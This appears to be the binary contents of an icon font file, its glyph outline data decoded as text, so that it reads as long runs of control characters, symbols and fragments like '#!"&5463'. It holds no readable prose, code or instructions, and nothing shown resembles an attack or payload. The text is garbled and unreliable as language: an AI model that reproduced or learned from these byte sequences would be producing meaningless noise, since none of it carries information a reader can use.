�gI+	-?%&2FF2I�	W	W		��	�	�	������2?k46;5#"&546;5#"&546;5#"&746;'.>+"&7'&6767154/&'&6767'&6767'&676'&>[
>~��}�
	|PkI%		

�
={4	
N^
	_M
	g$Z
��.

#

0ZC	
cy
	zb
	�&����@�-E%&'#"/&'&767'&6?6632654&#"6"326591W+
��)w
}q<1W+
5(*Y��"P8*&�T+:
e	
��:��(fT+:
H
W�'38P	
=���� (/7W2&/76'&"&'&4757633#"&5:64&"3#&"264///#576;?�
	7�

P
"


b	
�`@
)			��`
				�
		
 	5[7	
TR;�	7�vI
!Z@�
			)�
@			

	&
R�7	K<���F#!"&547670>321&0#".'&'&2>767654'�`)||)B#G
G#	$FF$ Z		Z B3		32


2����'/D#32+32+#!"&5463!232&"26454&+"'#";26���@�4&&4&0'*
	�	
 @(@(0�0( &4&&4�"��@�+7CO2#!"&5463"26454&+"'#";26754+";2=4+";2=4+";2� �4&&4&0'*'
	�	
����������``&4&&4�""=HH����2"&4$"26427.#""'&#"�Α�ΑH44H4��94 ( 4��Α��14H44H��D!!����#72#!"&5463";264&#"26454&+"'#";26P��`		`		4&&4&0'*'
	�	
��`� 				�&4&&4�""��@�	+7?R2!5463!#!"&%;2=4+";2=4+";2=4+"&"264;26'.+"'#"��0@� `�������4&&4&�
�
"*��p0���HH�&4&&4�
�����3C#0#"&54754622654.'54&"37"&5475462� K55J 8P8`!/(%A%6%  `�%05KL50$�(88�h/!			��
		%P%%%�

������"C7"&54754627#0#"&54754624.'54&";26�%6%    K55J 8P8(%!/@%%%�

�0%05KL50$�(88(��			��
		%/�����"C7"&54754627#0#"&54754624.'54&";26�%6%    K55J 8P8(%!/@%%%i

i0%05KL50$�(88(��			��
		%/�����"C7"&54754627#0#"&54754624.'54&";26�%6%    K55J 8P8(%!/@%%%)

)0%05KL50$�(88(��			��
		%/�����;6"&4627#0#"&54754624.'54&";26�%6%%6E K55J 8P8(%!/[6%%6%%05KL50$�(88(��			��
		%/���!)19AIQYaiqy����"/&47.7&#"#4632662"&462462"6"&462"&46:"&42"&462"&462462"6"&462462"6"&462"&462"&462"&462"&462�� .@S;7):
			)			W			�			2			`			�			)			W			w			W			W			I									8�O. ��2;S%H									)									)									7						)							)			)			���F%2++"&=!+"&=&=#"&=46;5463266/&7.7&#"�

 

�

 

/!*$_	
	
�

 + 



 + 

�!/"
	_/
�����+QY"'.542''&546'&'&7654&2&767>54.#"'.542"&4J�u.W=9R0;)%5��F8%,!+6Ig*$9E�6%%6%)U,,U�
+>=UQ9A,
()95%+�]BlN.5, gH-NlB]%6%%6���2#!"&546354#!"��`������`�TT��`%2#!"&=463��``  ���!)+54&+5463!2#!"&5463!24+"30/!� ��� D������!/0��� 04	���/?O_o�+"&546;2++53232++53232++53232++53232%3#"=#"=4;5473#"=#"=4;5473#"=#"=4;5473#"=#"=4;54���`********�********��`�N0f0f0f00`0`0`0�������%/&/"/+"&="/&4?5/.?/&?'.?>7'&/&6?'&?6'&>?65'&4?6546;2762?>76/76�!?5

 	
6?!"F@@F"!?6	 	6?!
"F@@Fg

G$N5
(		(
6N$G

%%

G$N5
(		(
5N$G

%%����	�'"/&4?&67>�(0$X%�	3	�
$1��*�1$
�	3	�%X$0����*<+"&?.5476227>56227562.>32+"&7�% 

@

,,,y,"*9

8�_"&7�

�*"_�G;����#VLB&
�0

����&2#"'&?632676&+"&=466CrC�g_G
	(0?FaeEB0*�
$G�BsCg�@	(*bEGc,*
�$E����	!-E!#!"&26=4&"26=4&"26=4&"%2#!"&=46;76;2 ���				`				`				@		�`		x	r	P���		�		�		�		�		�		�	 		 	

����:&#"+"&7>3276+"&73232>76;2#"'&=46s1B:[
9�ZcH$
��׆*1B&D0	
9�ZcH$;-G8		WsE$�
y*-!9%		WsE$�
����"0%"&54675#"=4;2+7654&+";2�z�zeKx8,			"�((�VzzVMu"(("	$			3b������1%&=#"&=46;546+"&=46;2+";2��

����T(88(TT

T��`
`
`��8(�(8(
�
���1!#"=4;26=4&+"=4;2'&=#"&=46;546�TT

TT(88W��

�(
�
(8(�(8��`
`
`����$276+"&?&'&3276#"&46dG$
�*0BEeaF?0(	
G_g���E$�
*,cGEb*(	@�Α���08DL%#!"&5467&546;&546;2654'6323232$"2646&+"26&264&"�#*��*#*&!/	(8&*����<8<%O(**(#*&/!8(&*#[x  `��@�!)4%#!"&546;3%#!"&5463!24&"2!5'&'&���/!������((D`X�( �!/PD((`0pX�(�����
!(/&?62'6&?6?6&5#75�.	o		.(<�	o		��z\
�

�$$ @2.		o	.<(		o	��z 
�

�h0@ $�����&?'762#���r
�9�9(c���
r)(9�9�����	!'762&7>?'/&?62�9�9(�US�"r/7"�fw!v(9�9(TS�"7/r"�fv
����732"/&6;4;2�.VV.8fVV.��M�37/&4?6!2#�VV.�.VV.8M�3%546&=!"=43:VV���.VV.8
����#"&?62++"5X.VV.8VV������;%+"&?'+"&=467'&=46;27'&6;2/76�
p$kk$p
$kk$
p$kk$p
$kk$hp
$kk$
p$kk$p
$kk$
p$kk$����)#!"&546;46232&"26454+";2���P&4&P�H��P��`&&4d��M346&=#/&4?63zVV�VV�VV..VV.
����72"/&6;5#"&?62+�VV..VV.FVV�VV�����"&462#"?6&+54+"��Α�ΓGssG@'Α�Α�tsst����"&462'#54&6=32=4gΑ�Α�tsst8�Α�ΓGssG@����2"&43?6/&#"�Α�Α�tsst��Α�ΓGssG@����6462"75326/&;;2�Α�ΓGssG@YΑ�Α�tsst��@�2/"/&4?'&6;26#!"&5463!2#!!547@$��$�
���(
��@��$��$��
�`���
����##!"&5463!2#"?6=4&���`Xp �			� p��`$ �			� p
���+5463!546&=!"&2#!/&4?6
hPP��
�

��PP
0PP0�

0PP0����1%#!"&54674546326326&+54&+"#"7.K5��<T6*^B,J(8�A	0	Aj�$65KT</JB^,$8(ip		pj����1%#!"&546745463263226/&;;26=.K5��<T6*^B,J(8�jjA	0	�$65KT</JB^,$8(Njjp		p��@�#'#!7#3#3'!"'?3&�ZeE0E��E�PEee{G�C{e������� ����B������E�%"/&6;#"/&6;232:hh
@T8�
@8pp8
������E�++"&?6;#"&?62:
@
�8T@
hH��
8p��@�&2+"&=4&#"32#!"&=46;54i}Z
 
+*0����Y?P

P*+G��F@����.5462"&264&"�="
p�p
"=B//B/6#X$5"PppP"5$X#
�/B//B��`�0R232+"&=46;5.=46;26=463"&=462#";#";#";P	WA8		�		8AW		B19T	hP88P8UUUUUU	0Bc	"				"	iD(		*3NM80	�8(�(88(  (��@�#2+"&5463264&"74+";2�c�����`�� Y8����-27?DI%2+"=4;5#"/&54?6;2%2#!"&546334&#5265#264&"5"75#`@

��

@%%@�P88P8p%@@%�7
X�
��

@
��%�%�B\BB\b@%�@%������
(%67#"/&?6'&?667'&?6Py�p�
��	

a<0heC>Wh0�

�

	��$%2p������+2#!"&5463"26454&+"'#";26P���4&&4&0'*'
	�	
��`��&4&&4�""����� 76&7>.'/&4�4PL20#	.6"��

P	)B,,U2&
X
�����'.54>?62>7'�.=9*M@'	�Kc�l?sSC)C_�G
P�F%�lJ����#2#!"&5463264&"74#!"3!2�������H��`�� Y8����@�
&.BLT2#!"'&54%"32?4761.264&"6264&"%6.'&3654'73264&#"264&"��'	�D	' 		
			�C
=#	n	L


.��wNCCNwi		

���5
		�%�@�/!!$3#!"&=264&#5463!2"'4&#!"3!265�@���� �L
��

P
 �t(``(``8

�

���$"&4622#!"&=46;27<xTTxT5K�`K57#L#�TxTTxtK55K���+2#!"&5463'76/&'&??6��`LCC		(		BB		(		CC		(		BB		(	���`��BB		(		CC		(		BB		(		CC		(	���� &,%#"'67'&477&'6267&'%6'77&7p!HddH 66 H�H 67���T'FF'!D�D!&FF&!D�D"MM
CC�MM
BD����
 &+'6'676'7&'%'67%&'667�*N5i.9S?��N7M
<.�4b�.8S?^N7M
��.�4b�*N5�M7N,�.Fb4"N*E�.�?S,.Fb4"N*E�.�?S�M7N,����2"&4264&"6264&"264&"�Α�Αk`��Α��'Z�����!CK_s�7'&6;5#"=4;54;232+32&'54;2354;2354;2#6'354&"+"=4?54;2#+"=4?54;2'##65#"=4;2L"33"�4�
/		x�����~��_

_[FF>45=#		{##**�g33g��@�&2.546;22?#5.54>#!"=43!2{0$ xq�!5���(r

9xq?3&(::(&&\M�m ���#'+/37;?CGKOSW[_cgkosw{73#!#53%3#%#53#53%5353353#5##5533#3##553%3#%3##5353%#5!53#5#5%3#3#'3#73#'#57#53#535353�@@@@@�@@@@@@�@��@@@�@�@�@��@@@@@�@��@@@@@@@�@��@@@@@��@@@@�@@@@@�@@@@�@@�@@�@@@�@@@@@@��@�@@�@@@@@@@@�@@�@�@�@@�@@�@@@@�@@�@@@@@@�@@@@�@�@@@�@@@@@@�@@�@@������.#!"=43!22!'&6;5#"=4;54;232+���h
V��V�22$228
��"0$22$0����%19%!546?>=#"/&=4?'&54;22#!"=43"264`��9
<	�Pp��0��/'

2/�
	p��P��0�#/!#>5#"=4;.546232+2#!"=43�	
 (1F1( +��%@%
)#11#)
;X����@!"=43!22"&4!&54?632>74>;2276;23276���h�/!!/ (i��i(
)D)@!.!!.z��
&)) &
����%-97'&=4;23546;23546;2!67354&"#!"=43!2Q-(0H0(- �� P@���h�*x,,,,x*{nnR@@
�����/S2+"&=#"=4;54632++"&546;2'2+"&=#+"&546;235463h

0

@
0

0
�

0
�
0

0
�
`
��

h0h
�0h



h�
�p

��

�

��
����
Q'&'&'&'>7'&'&'&??6/7?6/7?6/76/&�
�63�4
�63�g��gf�45��[45��o��o�T����#-8B73+"+"=4&+"&%#.54622654''4''32674''326`�

(

@$�-5z�z�H
@ 


�5,&]7Vzz�/

M�<62"'67"&5�Ԗ�Ԗ7��7�Ԗ�P88P8((n(88(����#5%/6?6&67>32"&54>'7>76W
�65_<Q	"..C.�
�";V"�
�m($*
 pJ�/B//!A
�+m7+�	���!!�@����	�
'%&'762&/"/&4?'.72"&4�0q"�8?�?/�)$Y5g#	>P88P8� /�8??/��$g5Y#Q"�8P88P������$,87&'>7'&67&'&'6327&'67#"'6'6&�n$%_E$>_GE#�61Y0253�LS'*F�>!3v�E[E<
�0K*--'�E|#/Fr 1Nc>P�& ��]2�U(
1)++FR;$/�D_5E�������:BJRZbjr2+"/&>5462;2=462;2=462;2=4264&"6264&"264&"6264&"264&"264&"6264&"��}
!	�							I							I			)			)			P
�q�!
!�

��

��

�H
��			W			�			W			)			I			w			 �`	'/746;#"&52+!&"264"264&"264"264&``&@&&`��Fn &��&&�&@��@���RnR���	0#532'#617>3!#!"&5����3c�`�
!������@�)>%2+"&=46;75%"&=46;7532#2+"&=46;750		�		P  ��		P  P		�		�		P  �	�		�	``@	�	``	�	@	�		�	``���92#!"&546;546;2'3554+54+"#";;2=32��`P��� 808808@�� 00   �088088����
"&5462654'�Ukk�kj,T6``�M�:^vv^:���5*8ii8*��G�%/%#"/&'"&=46326763254&"7'&#"+'$<"�B\BB.-@
$<"��(#RA�']1�
�.BB.�.B>,!1�pp-:]	)����-2#!"&546;462&"2646/&'&7P��P&4&6a			j.			R	���`&&�	j/	T����%-5AMY2#!"&546;462264&"6264&"6264&"6"26454+";2=4+";2=4+";2P��P&4&��h���������`&&��RR���hh����3;CK[$"&462&"&462'&67676563267'&'#5&$"264&"264&"&4622#!"&=463�			�H44H4��7VJ<E /

27�81
7n�			�		��		�			G4H44H�	
 #
	[[n			�	 		 	������<AGM>7.'&6;2!676;23&'67+"'&'!+"&67#7!36!&'# B--B 
 8 

*M1,"
 *9
 �� 
�$����	��
�./DIID/

(?9@$Z8		h����B�5=%'&>?7'76&'.'&7#"&=46;276264&"&5>!=!=<���D-+,\Y		pd-���((��cc�5)G,8,7#	 	��$G�((����B7"&546;7532#2+"&547#"&547#"&5#"&=46;2�		�00�		 		S(�(S	0		`	�		�  �	�	@	 				p	 		������6#532;#!"&546;4+54+"#";;2=325y�
7
�
��

�@808808W
��
��

�
��88088����/8;#!"&=32?3264&+'&"'&+"=4;546;#532 
�
��
F#
9Z		F#
9�8
ș�
8
��

�Fr,		Fr(�
i
���@�	
)346;#"&5!%;;2=32=4+54+"#"%2+00�@�808808P0p�@0��@�088088������@�%1=Ieq}2#!"&546;546;254+";2=4+";254+";2=4+";2754+54+"#";;2=3254+";2=4+";2 
	��	
�
�
�((((�((((�((((`
��		p
@

@��((�((t((�((���((�((���#2"&454+"#54+";2=3;2�Ԗ�Ԗp0`00`0��Ԗ����XX�XX��@�.82#!"&546;35"26426'.+"'#"3#546;2� ��F4&&4&
"*
��
@
���```�&4&&4�


�``
����9E2#!"&546;462&"26454+54+"#";;2=32=4+";2P��P&4&6H808808�����`&&��088088�����8<@7"&=46;7532##32#!"&=46;5#"&=463!25#!5#�		p@@p		�00		��		00		`		������	�	�  �	�	�@	 		 	@	 		 	@@@@@��D�'2"&=454&"7.7>/&76B\BB\B�(��/vT"�S	#�/�B.�.BB.�.�pp�#	Sv/7Tv/�"����!15!#!"&=32=4+532=4+532=4#72#!"&=463 @
�
xxxxx�

��

@��

@@@�
0

0
����52#!"&=463!#!"&7;;2=32=4+54+"#"h

��

@
�
@808808�
0

0
� `��
�088088����#?G%2+"&=!+"&546;235463'"=4;276232+'"/"&462.B	 	�	 		 	�	��2f		z2L4&&4&�B.�		00		`		�	�(c		7		,c		7�&4&&4����IQY^%2+"&5#"&=32=4+"=4;2=4+"=4;2=4#!"=4;5463!232264&"264&"75'#p		08P8�8P8�������8,d�,((\((�d,`	 	(88((88(�00dlp((((�dp����#37NZ%2+"=43+"=4&'&=4;22#!"&=4635#+"=4'&=4;22+"=43x0).0$0p		��`�0$<0X0`��	W1&B%>>��	�	@p@@B9!,*AB>,��������>7//&?'&??6/7?6'7//&?67'&?6�@��&@BC87-8�-I"�"9-A��CB@&87.8�-J"�"8-������$.2#!"&562#".'463/&76.76dx[	��	/	[<7*T	#�/F�/vT	#M::c:M$1kTv/�#F�#	Tv/�����(#"&4?57?6/7?6/7?6/7>�#�dYY-22-22-23.M�!R�YYe.32.32.32.������/#"'&6?'&?67'�"�+/�"FO�"�$ R�"�EO�����';?"=4;2+"&=3352#!"&=463"=4;2+"&=335H�/B/0@�		��		X�/B/0@�00�!//!�``��	 		 	�00�!//!�``����#A%2#!"=432#!"=43%2#!"5743%+"=4&#!"+"547%62���p��p���P��P`00`00�00� ���

�W q���!22#!"&546;2654'"&462'"2654'76.�&&��&&q�qd�^^�^�""�&��&&@&-3OqqO3-�^�^^�:O����3}62"&4"&4622#!"&=4632#!"&=46;!'54+532=4+54+"#";#";#";#"26=3264&+532=4+532�			�			�		��		`		��		0`�hhhh��hh@(@(@hh�@						�	 		 	�@	 		 	`���    ((  ������"-%2?/.=32?7/76!6/.7��
��
�@@��\����\��'�66�'kkp8� 

 �8�����$,2#"'#"&'&>7&54264&"264&"264&"�Ԗ�j83AL9s���z�z319JVv������$747#"'#"&767&'&?6632@	E&(83AL,9:
��	

iI`j�9��
3
4+9�

�

	R5zVH:��974&+463!2#"!%2+"&=!+"&=&546;2!5463�& 8(@(8 &���& 	@	��	@	 & 
�
�&(88(&@`&$y				y$&
``
���Fh$"&462'+"&;26=>54&/&546;2?6&'&'54&+"2#!"&=46;#"3!2=4+67V�zz�z�"?
&
	
">
'

�

�@

 +?

l

@, z�zz��$!




$!



��
`

`
''�����	)1&'67673+#&'&6?&'&54762546264&" N5 
,pp ^BMA
k.�U}N/			;1%
E8K@�B^8H$Qh=7	
EX<!/`			��A�%%#!"&=46;76;2+";2?625���		7/ *�N		v]	x
	y	`	&		J��A�8%'&6767>"#!"&=46;76;2+";2?62m=<m���		7/ *�N		v]	�rHHrH
	y	`	&		J��!�>e.'&67546;2'&+"+"&=&'&4?6;254'#!"&=46;76;2+";2?62		 	2		!	�

���		5+'�	J		pX	0%			%			�
	y	`	&		J����"E7+"'&/&=4622?6/&>$2+"&=4?>2?54�9	�i
Z
&�
i�	9&

Z�M"+p		�
�

�l
	3�
�
�		p+"M
3	
l�
������%@2+++&/&6?54?26=%54&+"&=4?6;76�


&�gPPA*<*,P!�"!gg
0
@
&<�.0$'z**8%.!X~	
<�����5++"&=47'#"&7>7#6;5#462#327#4'
	�		�
�	
.C)>t0pQ^Qp0t>?X
��		
��
$A,Dl��RnnR��lDT������en"&462"&462#"/?#"#.?6?'#&/&/"#"&/&?676546;2?676.7�((d((N)
C
	


+3�3+



C$
	�	
#��)`((((�pE.d L]
\1G
!!
G1\]L P 
'"
`		`
"'
 �.E
����@�CKZ%2++"&=#+"&=.5#"&7>32+";>;26;264&"'"4&54621&#0		1
	@	�	@	("
+X:�, 
i			�8P8�	�	
Q		00		Q'0&	7I"L@			�(88(������)?/.%'.4>?6762'67&"uO[D	�	E
�
,
"k
,"O4!Z!�Xf#	II@&W;���&.;C%2#!673264&+"&46;&5462#"3"2642.54264&"�(88(���

`(88(--8P80`

m�xP80 5S�8P8!8P8@ (88(P�8(P&V(H���2+"&="&5%3&'>@]�	 	]��@tU+)2;`�]�		��]@V�	=/*���#'2#!+"&5#"&=46;546;25!�		��	 	0		0	 	 @�	 	��		p	 	0		0��������"/<62"4&"276'.#"?62&276&"�Α��7�

%
&�-�-

#nYΑ�Α						o66*����!2"&42#!"&462&264&"�4&&4&�		�p]����C�P88P8&4&&4�	 	����]^B@8P88P������)17'&>?7'72&!#"&'/&7%46264&"21M>M2�LB.-A�w
Z�((H�\]�:~�p.B?-l.^D
�@((����)19?G%+"&547##"'#"&5463!232264&"264&"%3'&#264&"m	/B/�/!((!/
�
&��0\+�V	!//!!/  /!P

`��0+�������&/'&?632576%5#!"&z

���%	

N� n"��n
��

	�!

	=��K�
���
����%�2+"546;5.?4>;2��(4@�	@4uW7��7Wu������!'&?6>323!"&=46z
��	

�M2<T!�0���O


�

	i/=T<0&3�
7O����.6RZb7"&=46;>3232+"&'7;26=4&+"/?+54&+"#"&=46722"&4&2#54@		P0.%			P`P8(0(8�H$$$$�3EP
�
PE30p			W	 �	`	+5$	`	+55+X(88(Y$$$�L3
@

@
3L`					00����+$"&4622#!"&=46;27%/&?676jKKjK&7O��O7#L#T	�	Q			-i	�KjKKjkO7**7O��	R			-h	����+3$2"&454+54+";2'!"&=46;2732&"&462�xTTxT�
&


<
�(#��O7#L#
+jKKjK�TxTTxB
6

L
,L*7O&HKjKKj����;CKv%/'&=&''&'&?&7'&767667547676264&"&"&462#!"&=46;2732332?b
!!

!!
�((�jKKjKI��O7#L#


	K    0((tKjKKj��
*7O

'����$/$"&4622!"&=46;277&7%'?62jKKjK&;)N��O7#L#>�G�=*H%�KjKKjk.M=
*7O��G��*H&����#76"&4622#!"&=46;27$"&4622+46=4'6;27�\BB\B#0C��C0	!F!P88P80.B�(*�B\BB\bC00C 8P88PXB.'9+����:%#!"&=467&4?6"&547'+"&?&5475?6K��K6_���`KjKB*M6

6M_P..5KK55
>	>
;����3;%!"&=46;2730&"&4622+"&=46;5462#54&"@	��O7#L#+jKKjK

�

 /B/0��*7O0KjKKjk
�

�
0!//!00

0����+%2+"&=463"&4622#!"&=46;27p		�		�jKKjK&7O��O7#L#�	 		 	0KjKKjkO7**7O����%-%#!"&=467'47&52>32#"&'7"34&#E4G��G4e�++1#5KK5,Cg
�
�L4**4Lf�33(KjK5)`

����7%'.54?6>7'&"&462#!"&=46;273230n$"5Ps!;`�jKKjK 7,	
��O7#L#�$@/&sN-�N:&KjKKjsDm#*7O������!'&?6>324>7!"&5z
��	

�#8!5K0&��3��


�

	r 6K5)B
� 9%�����+@%"/&=46;22>4.#"'".54632#!"&=46;2732w	
\		[O\
�#;"K5#;"KK:��O7#L#S		]		[O
E
X";#5K";#5Ko(:*7O����$"&462#!"&=4677'3jKKjK 5K��K50  `  �KjKKjlN5**5N��88�����;CKb��%/'&=&''&'&?&7'&767667547676264&"$"&462"&5462"'&#""#"&=46;323630#3273'#"&=46;2b
!!

!!
�((��4&&4&�.BA]B	

f�D/	!##
�(B
&@k    0((t&4&&4FB..BB."�


0C '	�:#
 &���;?%2#!"&=463264&"";#";#";!'#"&=463!3'#�%
��
%sH���ri�	g��QQF@% 

 %`�@@@`�@����@�"6#.5476'&'"&546
�OM{O�
����'	l	//	��	'R	����$9Kil"'&476;2#'+"'&476;2%+".7>&'&>;22+"&764'&63&/#/.7&54>23'�"		_		#
#		#		#y"		R�1�1�"p`06
,
�4]+	9|9	9|9	)[6@6
,
d��
vv
:�t����)%/6?6&67>3%'7>76W
�65_<Q�	�";V"�
�m)$*
 pJ�
	�+m6+�	����
!#463!2#2#!"&=463!53`@�@P		��		����x��`��	 		 	@@������472+"&54632276&"&4622+&'3533!&#5463�/A�A/(P88P8P�	L�@��!`B//B 8P88P��&@@ 2.����-7@%#54&"#54?5#"&=46;546;232+46?#"&5%+5�`%6%`p0		0	 	0		0��mp	m	p�	�`%%`�	D3	 	0		0	 	3�	/�	�d	����	(085 7"&5"&46232>7"&5%567$2"&4&'67==q�q��qq�q�h:&H>q�q�?!#���pp�p�0n37++++&&@&4&&4�4&&)?+	�/B//B	"%+����2"&44635"264&"62"&4�Α�ΑX^BOq�P88P8S��Α��gB^ qO`8P88PH����)12/"#"+/#&54754632264&" (8`M=),'&,ayt/!'J�%PAepxhx=	%!/ H����;!2#!"&=4632#"'!'#"&4626?&5462?&54		�`		�(H��H(HR(RH	 		 	@(��(

+��+

����(08@HP2+"&=7>'264&"'"/&4?62264&"264&"6264&"6264&"264&"P��	
�(��(����.�1��(��(���rr�����'/72#!"&5463264&"6264&"264&"264&"6264&"�%%��%%3ss�%��%%@%���ss�����'/2#!"&5463264&"6264&"264&"6264&"�%%��%%3��%��%%@%���������2#!"&5463264&"�%%��%%��%��%%@%�����'/7?2#!"&5463264&"6264&"6264&"264&"6264&"6264&"�%%��%%3��%��%%@%��MM�MM����'2#!"&5463264&"264&"264&"�%%��%%3ss�%��%%@%�ss����2#!"&5463264&"264&"�%%��%%3��%��%%@%������62"&46"&4622#!"&=463�6%%6%[6%%6%�

��

`%6%%6�%6%%6U
 

 
����!!2#!"&=46;463!2&264&"p		��		p m	 		 	��s�����"*!2+#5326!"&=46;467264&"p		�`p���		P
�	 	�@����!	 	m�0�P%2#!"&=463%2#!"&=463�

��

�

��

�
 

 
�
 

 
���"33&'"&476&&67>7>�'
!�b'�bGE:B�)!.,_Q�'g9,'1B�5t*"-,!����@�9A32+'6.'&"?632#!"&54>7>2264&"�:)
�b6
	Zw	F#
 #& #O
	��&5HX0,:,S_#Vi
	~,
	B0
	%1]L<%%%C���@D!2#!"&=463'.=4&+!46;23226=.='&4?625#P		��		�/!%��&�&$4&��	 		 	U� +,p`&&�4$ 

�>&�����@�CP]%+"&/#+"&=4?>/&6323632'&'&&/&6?67&#";26%5&#";26>C0%.B$B.%0C-
C$'));7J7;))'$C
��##%$%6$%##%�F/C=,'',=C/F�&%
	��	
%&��)

%%

)������%&/&6?'.?>n��	��
	�"	�	ff
	����(.?>&/&6?2#!"&=4637

.��

��

�p

T
xx
D�
0

0
������&,>%"/&6;235#"&=463!2+2#'3.#!"&=463!260
V� 	(+а		�		�]�
�}#4�!#��		F
@
s@l:@	 		 	@�]
�|4#��	 	 �`)2#"'#"&4632627&#"!2>54&#"�FccFQFFQFccFQFF�////!+L+///`^�^OO^�^OO�@@&
&@@����@�4@D%"#"/#"+"&=#"'+"&=.54>76;2264&#"5@
JLL				,4$0	TFCP
.Ew
	h��1	;		16		JY4)D&
0.=K	
�c	����%'%&=467%6m
	��3	�Z
	�"	�	f����&7&=47%6'2#!"&=4637.


��

D

�p

�xDD
B
0

0
�� $H!5>4&'5463!25#35#35#5!#54&"#54&"#54&"#54&"���
@
�`@�@�@�`�@		�		�		�		=	cc#

��������``







������5U'&?65462#";#";#36=46;22+"&=46;5.=7z	
��	
�8P8UUUUU),		L		�		8AW4
<)2


	�

	�-(88(   0		0*&�				"	iD)(9'"����&,4:@#"'&#"#"'&54632326322>7&.#6264&"575&'m	+1>�>?5
+1>�>?��$"%�B//B/` ���	
>=
>d=��$8P88PT:�1
#����&#"'&#"#"'&5463232632264&"m	+1>�>?5
+1>�>?��B//B/���	
>=
>��8P88P����	%1=G1!#!"&%;26=4&+";2=4+"%3!2=4#!";2=4+"2!5463�
��
�	`		`	pp��0����0	��	@��
� 		 		Xh@	00	����KWco2#!"&54632>54&/&546;2?6'&'54+"+"'&;25754+";2754+";2=4#!"3!2`

��

�	-	-	�pp�PP���
��

�
��	



 h����3%#32+/&?#"&=46;7#"&=463!7632�bK�

�S	

37

�K�

R


4
�`
 
j		
C
 
`
 
j		
C
 
�����%-56+".7>264&"6264&"6264&"264&"�P�U&P&(/hP)
n/3���=N&@";*P}CJm��m-S����"*2#!"&5463264&+";26=72+5����(88(`		 	0

0���`��8P8	�		0�@����"&462"&467"/&4762�%6%%6%�%%6%%F

��





%%%6%%�%6%%6%�

��





����$4%2+"&=4633#"'#"&=46;2%2+"&=463�

�

@��@$I`

�
�

�

�
�

�
  @0p �
�

�

�
����%1=I6/"/"/&54676276254+";2=4+";2=4+";2f&6
66
6&&6
66
6�������	
� 
	------	
�
	-----��hh����	!%-15=G546;#"&52#!"&546;54625#6264&"5#35#6264&"72+5
  
�!/&��&/!p`@""�@�@""�

 �
�
 /!��&&!/@

@��  x""�    x""1
�
�������7&/&6??6/7?6/7?6/7?6/7?6/76|�PE<
<87<<77<
;E���'ef/0ff/0ff'���#G7&546;2#";#";#"32#!"'73;2=3;2=3;2=��
`
88888x

�@�)@@�)��

 @@@
`
�888888@@@72#!"&=46;;2=3;2=3;2=3;2=3;2= 

�

0@@@@@
�

�
XXXXXXXXXX���/73+"&546;2#";#";#";#"�X
�

�
XXXXXXX @

�

@@@@����	/7A546;#"&52+"=4;27#54&+"#4?62264&"%2+
@P	h0��	`	��3B//B/p
	P�
��	@@(@
���		�u
k�/B//B
��	@���	#.'7562"/&47�@`>SS�>+u5�@�SS>�+>u5����!4"&46;46;#"%2'&/52>76#"'.#57676�%% �%  ,IfHM-4#-:+0�MH2N/80+:-#3 %6%���6%��2.&B

�	 B&, 	�
���*2:2+54+"#54+"#"&?6'.54264&"264&"�Ԗ*	N@N		,2�4&&4&�4&&4&��]"A6B8888B Z4]�&4&&4&&4&&4���	/J7546;#"&2"&427735654&#"32+'2+"'.#".'46;2`	`v	6Ԗ�Ԗ=2��$q| 3$qO=2|�		#,#�@	`	7�Ԗ���$2=Oq�  o2=Oq$|	@	���t�3#"'"'"'#"'.?63!22767#!".=327!5Z&/,XX-/&A	�				
�@					
�I(Z!!!!!!Z(h���
		�dd������
%%53#!"&53%#!"&?63!23+"&@@
�
@�
��U	�	%@	 	@��

��""����		���/"&=463!2#2#!"&=4632#!"&=463		�		@		�`		`		�`		@	@		@	P	@		@	�	@		@	�����7'7'772"&464/76/&'7?6/76/&'&'76/&'&'76/&'&?'&?'&??6/7??6/7??6/76/&'77'7�---�-------jԖ�Ԗ�.""--"!-.""--"!-�---�---D---�---q�Ԗ�Ԓ-"!-.""--"!-.""-3---���+/M%#54&+"#54&+"#54?6;546;232'5#53#!"&=3;26=3;26�	�	 	�	 	�	.	
3�3
	����
�@
�	 	�	 	�	
S				S
	.	PP		@@�`

`				������%/&#!"&=4&&/&6?267w9
9
�
99�?L?`
r		�

�		r
`��C�:I"&462/&/&/&/&?.?67>327"&4?6�((.		-
<"	#8	�(	;
	2
`((�E2Y


JB"<	 	*"�4
,"	<	
2	���$2#!"&5463!2#!"3264&"��s%%p	��		C@�%@%			�����$6O2"&42654':12764./&>'&"67627>'.3232654'�Α�Α�P
�b FbP
��Α��W


	�&&�

	��@�"2!2+"&=4&"+"&=46;!2#!"&=4630		�	8P8	�				��			 		�(88(�		 	`���	 		 		����	#:BJ%6?#&''#>#6&'37.'#!"&5463!2"2645!"3>-''-V
."'--'L
�

��)77)F�jKKjK ��
�1) )#*)1�1))*#�	4
	7)@)7&KjKKj��@������,x�7327/"&?#'&/32767672>367'&"&'.'&'.'&764'&7>76767676276&2654.#"a4%4	
.
	!
	4%4	
J
		
	

	

�7N7+'U
�&p
Y&�



	
	

	�P88(,����-2#!"/&4?63'76/&'&??6@%%���		�>>>>>>>>�%�%�

��>>>>>>>>����'7M]2+"&=463#>7##"&46322+"&=4632#"&'##&'6=3>2+"&=463p

`

@629*P
%% %

`

%% P*926U 

`

�
`

`
8H'?0O	
%6%�
`

`
%6%O0?'H��
`

`
����1;#"'&54675#"&=46;2+7'&?6/'!&/5#.�&4,		�		'	4	+�%%`@!,34Y�	 
	 
�'	4	+.53,!�''
������	#2!54635!+"&=#"&"264`
��
 �%@%6%@%��
��
��  %@%%@%M���4@HR\d2+++"&=#+"&="&=#"&=46;5462%;2=4+"264&"75#";26=4&+264&"�


 
�
 



�������=�p

�p

ps@
P
� 

  

 
�
P
0".."08��]�
`

`
�������[%#"##"'&'+"=#"'&767"#"'&4767.'4546320454>762>7632�		<I		%((%		I<		 ,+	"S!!	
!S"+-X	@@		!V#

)5p(
.0F!)
	#V!	���)"/&4?62762'&4?62762"����$p���{*E�*����%q��|*E�*�����@�-2+"546;5'&63!22#"'73264&#"#>(�8�n��<TT<(#$(88(,
4J}��}�TxT$	8P8+5�)!4675#"&=46;2+2#!"&=463 Rn�@nR		`		�		� 		=~TT~				��	 		 	�����%-5=%/././&54?>?6264&"6264&"264&"�$
E'*M+7
$!E'*M*7
��3��*'E
$
7+L
E"$7+��������#+3;%/././&54?>?63264&"6264&"264&"�#
E'*M+7
$!E&*J5J��3��*&E
$
7+L
E"$4J5Jq�����1%2++"&5#5323#"&5#"&=46;546;2�

(
0
��
���
(

(
0
`
0
(

H`
�H��`

0
(
 �`'3?K[g2#!"&546354+";2';2=4+";2=4+";2=4+";2=4+"754&+";2654+";2`

��

���@@@(	�		�	��`
�


